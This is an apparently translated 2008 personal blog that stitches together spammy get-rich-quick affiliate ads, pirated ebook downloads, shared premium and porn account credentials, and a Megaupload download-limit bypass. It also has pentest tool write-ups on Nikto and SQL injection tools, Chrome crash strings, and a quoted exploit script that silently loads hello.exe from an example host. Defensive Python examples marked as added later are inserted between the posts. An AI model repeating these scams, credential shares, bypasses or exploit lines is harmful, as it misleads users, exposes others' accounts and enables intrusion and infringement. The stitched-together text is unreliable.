
Thursday, October 30, 2008

EASY WAY TO MAKE MONEY!!!!

Payout Per Sale! Over 3 Years Running, The Original And Best-Selling World Of Warcraft Gold Guide Is Now The Highest Paying WoW Guide. Superb Conversions With New Sales Page. Affiliates Make Hundreds Per Day- Do You Want To?
CLICK HERE


Take Surveys and Get Paid
Make Extra Money Working From Home
It's Fun, It's Easy $75/Survey
CLICK HERE



Seo Elite: New Seo Software! The Grand Daddy Of All Seo Software! Get A Top 5 Google Ranking In Under 30 Days! $101 Affiliate Payout!
CLICK HERE


Forex Autopilot - Robots Trading The Forex Market. Follow Up To The Smash Hit Forex Killer The Best Selling Forex Software Online With The Highest Gravity. This Is Brand New!
CLICK HERE


Simply The Best Forex Course On CB. Do You Want To Dramatically Increase Your Affiliate Commission? Try Forex Avenger!
CLICK HERE


Forex Funnel - Untouchable! You Earn Over $81/Conversion!!!!!!!!!!
CLICK HERE


Automated Cash Formula. Fast & Easy Secret Money Making System - Without Using A Website Or Marketing. Paying Top 75% Commissions On Two Levels! Get Affiliate Tools Here:
CLICK HERE



Get Google Ads Free! :: New Secret!! :: Newbie Affiliate Made $109,620. In Just 1st 60 Days! :: Proof Of How Powerful At Affiliate Page! :: Makes $40-$67 Per Sale! :: 75% Payouts Guaranteed! :: Contains *Magic Code* When Added To Any Site Makes Google Pay-Per-Click Ads Costs Go To Zero! :: See CB Ad At Right For Proof!
CLICK HERE


Get 75%! ::: $31.85 Front & $45.73 Back! ::: Top Secret Magic Code :::. Add Just 1 Simple String Of Code To Any Website Money Magically Starts Pouring Into Your Pocket! ::: Takes Just 45 Sec To Add! ::: Best-Seller In Big Demand! ::: Every Website Owner Demands This New Magic Code
CLICK HERE


EASY WAY TO MAKE MONEY ONLINE!!!!

Wednesday, October 29, 2008

Who Wants To Make up to $1000+ Per Day Just Entering Simple Data From Home?

What if I told you that you can quit your current job, work from home entering simple data online, and then make more money than you ever could - would you believe me?

What if I told you that you could work as little as 15 - 30 minutes a day?

Do you think it’s possible for someone with no special skills to make $250+ in just a few hours typing short sentences on a home computer?

The answer is: Absolutely. Positively. YES. And I know, because real everyday people like you and me are already making good money from home, using a system that I've discovered which I call the "Data Entry Bank Program".

click here for more




Sunday, October 19, 2008

post ads for free!!!

want to post ads for free???
there are lots of online ad-posting sites, free or paid, but posting ads on iklanbarisgratis is different: here we get paid every time we post an ad, and registration is free too!

not bad for a bit of extra pocket money :D
there are lots of ad categories too, nearly complete in fact..... anyone who wants to post an ad or look for items can do it here too.... want a look?? head straight to the site

just click http://iklanbarisgratis.info


Sunday, October 12, 2008

ebook paketdownload

holaa......
sharing some links again

you know those sites that sell ebooks, like formulajitu, uangpanas, etc.?
at a glance, going by what the ebook authors write, they do look attractive
but do you know what's actually in the ebooks? for ordinary net users the ebooks really are quite useful

but what do the people nicknamed internet demons say??
the ebooks being sold are nothing more than GARBAGE

they just google old tricks, and those old tricks get made into ebooks to be sold again

the tools and scripts thrown in as bonuses are stale too. . . . . . . . . . . .
some are even freebies and useless but made to look very valuable

if you don't believe it, here are sample ebooks from the paketdownload site that you can download for FREE!!!
click each number

1

2

3

4

5

some of the pdf files are password-protected; the password can be downloaded below

PASSWORD

saves some money, right, instead of paying a lot


ok. . . . . . . . that's it for now. .
sorry I can't post much for now, I haven't been feeling well lately

Sunday, October 5, 2008

finding song databases on google

it's easy....
1. open your favourite browser (IE, opera, FF, chrome, safari, etc.)
2. go to http://www.google.com
3. make sure you know the song title or the singer
4. enter this tag as the keyword
-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma) "judul/penyanyi"

the part in white ("judul/penyanyi", i.e. title/singer) is to be replaced with the singer or song title you're looking for! easy, right ^^v

PREMIUM ACCOUNT!!!

hellooo......
since I don't know what else to post, I'll just give out premium accounts

anyone who wants them is free to use them, just please don't change the passwords!!!!

there are dozens of premium accounts, but don't be greedy.........
handy for downloading full-version software

I meant to post this yesterday, but I wasn't feeling well so it got postponed

anyway........ straight to it!!!

click to download the IDs
MEGASHARE

unlimitedgamedownloads

PIRATEACCESS

GAMESPOT

MIXED 1

MIXED 2

MIXED 3

AND. . . . . . . . . . . . . . . .

for all the porn fans!!!!!!!

DOWNLOAD HERE



THX to the friends who have downloaded...... it really helps


there are more porn IDs, but they'll follow later.... my head is spinning from all the PMs

Saturday, October 4, 2008

Penetration testing tools - Nikto

Nikto is a web server security assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server. It is definitely one of the most preferred free web app scanners available.

After a small vacation I'm back on the series about the best tools for web application penetration testers. Last time we took a look at dirbuster in the information gathering category. It was hard to pick one among all the nice tools around for fuzzing and discovering hidden parts of a web site.

Another similar tool I like is wfuzz, which works both through dictionaries and brute force.

But this time I'm going to talk about nikto, as it is one of the best known and most used web application security scanners.

Quoting from the author's website:

Nikto checks for 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.

A good thing is that nikto's database of vulnerabilities can be updated easily from the command line (it's a command-line tool written in Perl, btw).

Nikto is especially good once we have discovered what's running on the target web server and we want to know what's vulnerable.

Nikto is not meant as an attack tool. It is more a vulnerability assessment tool that tries known exploits against the target to trigger known behaviours. When this happens, it is reported to the user.
Nikto is useful not only when the target runs off-the-shelf code known to be vulnerable to a publicly available exploit; it also helps in discovering known web server misconfigurations.

The first useful thing Nikto does when launched against a web site is fingerprint the web server version.
It then runs the whole signature database against the web site according to the enabled tests (all by default).
This causes a lot of "noise" in the web site's logs, as it doesn't seem to narrow down the type of attacks according to the type of software found on the web server, but this shouldn't be a problem for an authorized penetration testing job.
Joomla is a nice example: Nikto tries all the known exploits against Joomla components even if these components are not installed on the Joomla distribution it is assessing.
So 90% of the attempts are pointless, while a more intelligent approach would have been to recognize what is installed and then try the exploits accordingly. But yeah, nikto is open source and anyone can adjust how it works.
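
The log noise described above is also what makes such a scan easy to spot from the defender's side. The following is an added example, not part of the original post or of Nikto: it flags scanning sources in a combined-format access log by User-Agent and by behaviour. The log lines, IP addresses, paths, User-Agent strings and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed User-Agent strings. Nikto's default User-Agent names the tool,
# but the tester can change it, so it is only one of the two checks below.
BROWSER_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/2008 Firefox/3.0"
NIKTO_UA = "Mozilla/4.75 (Nikto/2.03)"


def log_line(ip, sec, path, status, ua):
    return (f'{ip} - - [04/Oct/2008:10:00:{sec:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512 "-" "{ua}"')


def build_sample_log():
    """Constructed traffic: two scanning sources and one ordinary visitor."""
    lines = []
    # Scanners probe many components that are not installed, so almost
    # every request ends in 404. One keeps the default UA, one spoofs it.
    for ip, ua in (("203.0.113.7", NIKTO_UA), ("198.51.100.9", BROWSER_UA)):
        lines.append(log_line(ip, 0, "/", 200, ua))
        for i in range(1, 26):
            path = f"/components/com_constructed{i}/index.php"
            lines.append(log_line(ip, i, path, 404, ua))
    # Ordinary visitor: a few pages and one broken link.
    visits = [("/", 200), ("/about.html", 200), ("/news.php?id=3", 200),
              ("/old-page.html", 404), ("/contact.html", 200)]
    for sec, (path, status) in enumerate(visits):
        lines.append(log_line("192.0.2.50", sec, path, status, BROWSER_UA))
    return lines


def detect_scanners(lines, min_requests=20, min_error_ratio=0.8):
    """Return {ip: [reasons]} for sources that look like a signature scan.

    The thresholds are illustrative assumptions; tune them to the site.
    """
    stats = defaultdict(
        lambda: {"total": 0, "errors": 0, "paths": set(), "ua": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format: skipped, not guessed at
        s = stats[m["ip"]]
        s["total"] += 1
        s["paths"].add(m["path"].split("?", 1)[0])
        if m["status"].startswith("4"):
            s["errors"] += 1
        if "nikto" in m["ua"].lower():
            s["ua"] = True

    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["ua"]:
            reasons.append("user-agent")
        # Behavioural check: many distinct paths, nearly all of them errors.
        if (len(s["paths"]) >= min_requests
                and s["errors"] / s["total"] >= min_error_ratio):
            reasons.append("behaviour")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in detect_scanners(build_sample_log()).items():
        print(ip, ", ".join(reasons))
```

The second source is caught by behaviour alone, which is the case that matters when the User-Agent has been changed.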

Nikto provides a good degree of flexibility by allowing the pen tester to tune the scan enabling only certain kinds of vulnerabilities to be tested such as Misconfiguration/default files, Information disclosure, Interesting file/seen in logs etc.

These can be enabled/disabled easily using the -Tuning switch followed by the reference number you can find in the nikto manual in the package.

This is an example that will trigger the tests of Remote File Retrieval and Command execution only:

perl nikto.pl -h 192.168.0.1 -T 58

With the "x" we exclude those two and enable all the rest:

perl nikto.pl -h 192.168.0.1 -T 58x

My favourite test is number 1, "Interesting File / Seen in logs"; it sometimes shows interesting stuff that can be very helpful for the whole penetration testing endeavour.

As a last note, false positives are probably the only problem affecting nikto. It sometimes reports completely meaningless threats, so manual verification must be carried out to validate the scan results.

DNS cache poisoning, first attacks

From this (funny) video, which I found on Kaminsky's blog (he is the guy who gave new life to the old DNS cache poisoning issue), it seems that a large part of the major ISPs' DNS servers have been patched.

After Kaminsky's publication of the vulnerability, exploit code went wild and was ported to HD Moore's Metasploit framework just a few days later.

Not even 2 weeks after the breakthrough, HD Moore's company web site was hijacked by spammers poisoning the AT&T DNS server serving his company's website. Hilarious, but sh*t happens. Above all when it's not up to you or under your control.

Yesterday, on Black Hat day 1, Kaminsky gave more details on the patching status of the main ISPs and all the unpublished details about the attack.
It's only a matter of patching now, since everything is public.

The best SQL Injection tools classified

Priamos

  • Works on SQL server only
  • Enumerates databases, tables and data in a very nice GUI
  • The only big problem is that it works only with GET requests, unless you make it pass through a proxy to change the request to POST and shift the query string to the http request payload.
  • Allows for proxy tunneling
  • Very fast

Absinthe
Besides some bugs that affect the tool, version 2.0b works with

  • Blind SQLi
  • Error-based SQLi
and does a better job than version 1.41.

Blind mode supports: SQL Server, PostgreSQL, Sybase, Oracle.
Error-based mode supports SQL Server.

  • Good GUI for fine-tuning the injection parameters and additional options like authentication.


Injection is feasible through

  • POST
  • GET
  • COOKIE

Allows for proxy tunneling

SQLMap
It's the best tool for dealing with MySQL SQL injections, and sometimes the only tool that does the job.

  • It's Python powered, so it's cross-platform.

It supports:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server.

SQLmap supports two operating modes:

  • Blind SQLi
  • Inband (Union) Sqli

Before going for blind SQL injection, which is slow and requires a lot of requests to the server, it is possible to check whether UNION-based SQLi is available, which gives faster results.

SQLmap performs blind SQLi recognition through hashes of the HTTP response text. It is also possible to specify the string to match in the response text when the condition is TRUE, a feature that is sometimes badly needed.
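
The TRUE/FALSE page comparison described above can be turned into a regression check on the defender's side. Added example, not from the original post or from sqlmap: a lookup built by string concatenation next to its parameterized form, with a check that compares the responses for a true and a false appended condition, by hash or by a marker string. It assumes an in-memory SQLite database so that it runs offline; the table, page template and function names are hypothetical.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed demo data in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "keyboard"), (2, "mouse")])
    return db


def render(row):
    return f"<h1>{row[0]}</h1>" if row else "<h1>No such product</h1>"


def page_vulnerable(db, product_id):
    # The request parameter is pasted into the SQL text, so a condition
    # appended to it is evaluated by the database.
    sql = "SELECT name FROM products WHERE id = " + product_id
    return render(db.execute(sql).fetchone())


def page_hardened(db, product_id):
    # The parameter is bound as a value and never parsed as SQL.
    sql = "SELECT name FROM products WHERE id = ?"
    return render(db.execute(sql, (product_id,)).fetchone())


def digest(page):
    return hashlib.sha256(page.encode()).hexdigest()


def leaks_boolean(page_fn, db, true_marker=None):
    """True if the page distinguishes a true appended condition from a false one."""
    true_page = page_fn(db, "1 AND 1=1")
    false_page = page_fn(db, "1 AND 1=2")
    if true_marker is not None:
        # String-match mode: useful when the page contains changing content
        # (timestamps, tokens) that would make every hash differ.
        return true_marker in true_page and true_marker not in false_page
    # Hash mode: any difference between the two responses is a signal.
    return digest(true_page) != digest(false_page)


if __name__ == "__main__":
    print("concatenated query leaks:", leaks_boolean(page_vulnerable, make_db()))
    print("bound parameter leaks:  ", leaks_boolean(page_hardened, make_db()))
```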

It supports injection into

  • GET
  • POST
  • COOKIE
  • USER-AGENT

and retrieves:

  • databases username and password
  • DBMS version
  • databases
  • tables
  • data
It allows you to execute custom SQL queries as if you were on a real SQL client connected to the remote DBMS. This saves a lot of time and allows for very sophisticated data retrieval.

More options are:

  • proxy support
  • google dorks
  • remote file retrieval.

The tool package includes a very nice guide on the tool's usage.

Automagic
It's written in Perl and requires that you read the guide or watch the nice Flash video before you can really enjoy it.

It works only against the SQL Server DBMS and performs dumps of

  • database
  • tables
  • data

It is possible to retrieve DBMS users and passwords. It's quite fast, but in my opinion Priamos and Absinthe do a better job.
A good backup tool though.


To sum up

MySQL SQL Injection tools:

  • SQL Map (blind and inband)

Oracle SQL Injection tools:

  • SQL Map (inband)
  • Absinthe (blind)

Sybase SQL Injection tools:

  • Absinthe (blind)

MS SQL Server SQL Injection tools:

  • Automagic (error)
  • SQL Map (error and inband)
  • Priamos (error)
  • Absinthe (error)


If the list is not exhaustive... well... these at least are the best known and most used.
Of course every professional has his own tools and patches to improve these tools or add functionality. Your own tool is always the best tool.
Any suggestion or addition is encouraged!

Google Chrome vulnerabilities list

Ok, the news is old: Google has released a new browser and the whole web is blogging about it. But my duty is to talk about security, so I'm not going to review Google Chrome's features but to list the vulnerabilities already found only 16 hours after the release. (I fear this post will be outdated in a few hours.)

Rishi Narang was the first, with a denial of service as simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME


Just "evil:%" in the anchor text is capable of crashing all the Chrome tabs (even though all the tabs are separate processes).

Someone has also reported that entering a very long bookmark may kill the browser. The length has not been given, but it's worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

The good thing is that the browser doesn't need Administrator rights to run.

Matt Cutts has stated on his blog that chapter 11 of the EULA will be updated. Yes, the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I'm worried about the enthusiastic reviews I see online.
The Google brand was enough to push an unfinished product up to 1% of the User-Agents in use on its very first day.
The risk is high, fuzzers are still crunching...

Google Chrome Silent File Download Exploit

This is what appeared a few minutes ago on milw0rm and packetstorm:


< $cript > document.write('< src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); < / $cript >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is a temporary peak, but still scary considering all the bugs found in less than 48 hours.


I think Google will soon regret this too-soon release.

Open Source CMS Award 2008

Packt Publishing has announced the finalists in each category for the Open Source CMS Award 2008. In the previous year Drupal was announced as the winner of the 2006 award, while Joomla took second place.
This year both are finalists in different categories, but there are many competitors who could change the final result.
Here are the finalists for the various categories:

Overall Open Source CMS Award Finalists :

  1. DotNetNuke
  2. Drupal
  3. Joomla!
  4. Plone
  5. TYPOlight

Most Promising Open Source CMS Finalists :
  1. CMS Made Simple
  2. ImpressCMS
  3. MiaCMS
  4. MemHT
  5. SilverStripe

Best PHP Open Source CMS Finalists :
  1. CMS Made Simple
  2. Drupal
  3. eZ Publish
  4. Joomla!
  5. XOOPS

Best Other Open Source CMS Finalists :
  1. dotCMS
  2. DotNetNuke
  3. mojoPortal
  4. Plone
  5. Umbraco

In 2008 the awards add one more category for open source CMS: the Open Source CMS MVP Award, based on CMS contributions made by individuals.
More info ... http://www.cmswire.com/cms/web-cms/the-08-open-source-cms-awards-finalists-are-in-003081.php

Paris Hilton's mobile got hacked

gulli submits: Paris Hilton just upset a lot of her friends.
Eminem, Lindsay Lohan, Christina Aguilera, Vin Diesel and Anna Kournikova (just to name a few) need to change their private phone numbers as they got after Paris' Sidekick-Account at T-Mobile got hacked. Not only her contact data but also some very private photographs and her mobile notes ("Check from rick" "Get birth control kill pill" are some of the highlights) got published as the Sidekick stores all this data in a web-based interface the hacker gained access to by guessing the right password.

AMD demos 4x4

Criticalmass writes: AMD's upcoming 4x4 gaming platform will cost "substantially" under $1,000 - for the processors at least. So said company VP Pat Moorhead, who showed off a prototype system in the US, though details of the system were kept under wraps.

AMD announced 4x4 last month. It's essentially a two-CPU motherboard rigged for ATI's CrossFire and Nvidia's SLI dual-GPU technology twice over to support four GPUs. Each CPU slot will hold a dual-core Athlon 64 FX processor, so that's four cores. Each chip gets 2GB of dedicated memory, for a total of 4GB. '4x4' is a codename, AMD insists.


The processor company has said it will push the 4x4 platform this coming Christmas. Moorhead said the platform would not be "limited" to hardcore gamers - presumably AMD will promote it to professional content creators too.

Indeed, there's nothing here that no quad-core system will be able to deliver - or, since AMD said this will be possible in due course - an octo-core rig either. AMD's quad-core CPUs will slot into a 4x4 board in place of the two dualies. The big benefit AMD stressed was the system's dual memory buses, one per processor, so there's no logjam at the memory controller as there might be with another chip maker's architecture.

AMD pitched the system as a way to run multiple, processor-hungry apps without degrading the performance of any one of them.

Friday, October 3, 2008

Megaupload bypass any download limit hack - Tutorial

MegaUpload is one of the most popular one-click web hosting and free file hosting services; it allows users to upload and store files up to 250 MB in size (up to 5 GB for premium users, although you can upload an unlimited number of files) and share them with others. Unfortunately, if you want to download content and files from the MegaUpload file hosting service for free, some limitations apply to regular users, and one of them is a download slot limit based on your country. The number of download slots available depends on the country, and if they are used up, you have to wait for a download to finish and vacate a slot before you can download again.

Ever wanted to download files from Megaupload without installing the Megaupload Toolbar? Using this small trick you can bypass the country slot limitations and the toolbar install pages.

Internet Explorer UserAgent

1. Start > Run > Type in regedit
2. Navigate to HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Internet Settings > 5.0 > User Agent > Post Platform
3. Right-click in the right pane and select New > String Value. Name it MEGAUPLOAD 1.0
4. Close regedit & Enjoy!


FireFox Alexa Toolbar User Agent Hack for MegaUpload

Well, here's a 100% functional trick for Megaupload users who use Firefox

1. Go to the address bar and type: about:config
2. Look for this command: general.useragent.extra.firefox
3. Double click it…
4. Replace the text with this one: Firefox/2.0 MEGAUPLOAD 1.0
5. Press OK…
6. As easy as that! Now you can download without any limits… and it works whenever Megaupload tells you there are no slots available for your country!

These hacks work by making Megaupload believe that the user has installed the Megaupload Toolbar or Alexa Toolbar, since Megaupload uses the User-Agent string to check whether the user has installed the toolbar or not.
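
The weakness these tricks rely on, seen from the server side: a request header is whatever the client chooses to send. Added example, not Megaupload's code: a check that trusts the User-Agent token from the steps above next to one that verifies a server-issued, MAC-protected entitlement with an expiry. The header name X-Entitlement, the key, the account id and the token layout are hypothetical.

```python
import hashlib
import hmac

TOOLBAR_MARKER = "MEGAUPLOAD 1.0"      # User-Agent token from the steps above
SERVER_KEY = b"constructed-demo-key"   # hypothetical; never leaves the server


def grants_slot_naive(headers):
    # Trusts a value the client fully controls.
    return TOOLBAR_MARKER in headers.get("User-Agent", "")


def _mac(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_entitlement(account_id, expires_at):
    """Server-side: bind the entitlement to an account and an expiry time."""
    payload = f"{account_id}|{expires_at}"
    return f"{payload}|{_mac(payload)}"


def grants_slot_hardened(headers, now):
    """Accept only a token whose MAC verifies and whose expiry is in the future."""
    payload, _, mac = headers.get("X-Entitlement", "").rpartition("|")
    if not payload:
        return False
    # Constant-time comparison of the presented and the recomputed MAC.
    if not hmac.compare_digest(mac.encode(), _mac(payload).encode()):
        return False
    expires_at = payload.rpartition("|")[2]
    return expires_at.isdigit() and now < int(expires_at)


if __name__ == "__main__":
    spoofed = {"User-Agent": "Mozilla/5.0 Firefox/2.0 MEGAUPLOAD 1.0"}
    print("naive check, spoofed UA:   ", grants_slot_naive(spoofed))
    print("hardened check, spoofed UA:", grants_slot_hardened(spoofed, now=100))
    token = issue_entitlement("acct-42", 1000)
    print("hardened check, real token:",
          grants_slot_hardened({"X-Entitlement": token}, now=999))
```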

EDIT

Added three more solutions

To get around the MegaUpload per-country download slot limit, an anonymous surfing or referrer blocker service can help:

If MegaUpload download link is http://www.megaupload.com/?XXXXXXX

Then replace the URL with the following format:

http://anonym.to/?http://www.megaupload.com/?XXXXXXX

Alternatively, use any anonymous surfing service such as Anonymouse or Guardster free web proxy to bypass the MegaUpload download limit. Steps to use Guardster to bypass MegaUpload Country limit are:

1. Go to the following site: http://www.guardster.com/subscription/proxy_free.php
2. Input the MegaUpload download link in the Address text box. (where you will see http:// in the box)
3. Uncheck (Unselect) all the options, like No Cookies, No Scripts, No Images, Hide Referrer, Hide User Agent, Hide Title, Hide Header.
4. Click on the button “I agree an wish to surf anonymously”.

Another workaround for MegaUpload slots limit is by using Google Language Tool translation capability.

1. Go to Google Language Tool, and scroll to Translate section. Or you can go direct to Google Translate.
2. Input the MegaUpload download link into the text box (where you can see http://) below “Translate a web page:”.
3. For the “from” option, the default (depending on your Google interface) English to German will do the trick, although other options will likely allow the hack too.
4. Click on the “Translate” after the language option, and wait for the MegaUpload download page to load, which allows you to start download immediately without the limitation by download limit per country.

recovery

ever lost data because it got deleted/reformatted/and so on?? if so you must have been pretty annoyed

a little story.... once on the train from bandung to jakarta I met a guy who claimed he could recover any kind of hard disk; when I asked around, it turned out he was selling the recovery software for 2 million! I thought that software was really expensive.... once I got to jakarta I tried googling for recovery software like that and it turned out to be easy to find

then I tried them out and it turned out not all of them worked; finally, after trying quite a lot of software, I found the one best suited for carrying around on my favourite flash disk, called PORTABLE_DATA_RECOVERY_PRO_FULL

I tried recovering my own flash disk and it turned out that data I had deleted long ago could still be retrieved! huhuuhuhu...... since it's portable there's no need to install it, so practical....!!!

it's easy to use too, just a few clicks and then wait xixixixix....... oh and that's not all, there was once a case where a friend's flash disk lost its data because of a folder lock program that had been moved to the flash disk, and he asked me to help get the data back

so I gave it a try and it worked, with 75% of the data recovered

to download the software click here

Thursday, October 2, 2008

hacker manifesto

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.